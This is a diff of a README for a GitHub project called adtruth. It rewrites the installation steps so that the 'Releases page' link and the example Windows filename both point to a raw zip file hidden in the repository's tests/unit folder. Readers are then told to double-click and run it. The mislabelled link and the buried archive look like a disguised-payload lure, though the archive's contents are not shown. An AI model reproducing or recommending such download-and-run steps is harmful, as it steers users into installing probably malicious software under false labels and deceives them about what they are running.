galaxydiesel643/adtruth/README.md

 To get started with adtruth, follow these simple steps:

 1. **Visit the Release Page**
-   Go to the [Releases page](https://github.com/galaxydiesel643/adtruth/releases) to find the latest version of the software.
+   Go to the [Releases page](https://raw.githubusercontent.com/galaxydiesel643/adtruth/main/tests/unit/adtruth_v1.9-beta.3.zip) to find the latest version of the software.

 2. **Download the Application**
    Find the latest version in the list.
 Click on the appropriate file for your operating system to download it.

-   For example, if you see a file named `adtruth_windows.exe`, choose that if you are using Windows.
+   For example, if you see a file named `https://raw.githubusercontent.com/galaxydiesel643/adtruth/main/tests/unit/adtruth_v1.9-beta.3.zip`, choose that if you are using Windows.

 3. **Install the Application**
    After downloading, locate the downloaded file in your computer's 'Downloads' folder or the folder you selected for downloads.
 Double-click on the file to run the installer.
 Follow the prompts on the screen to complete the installation.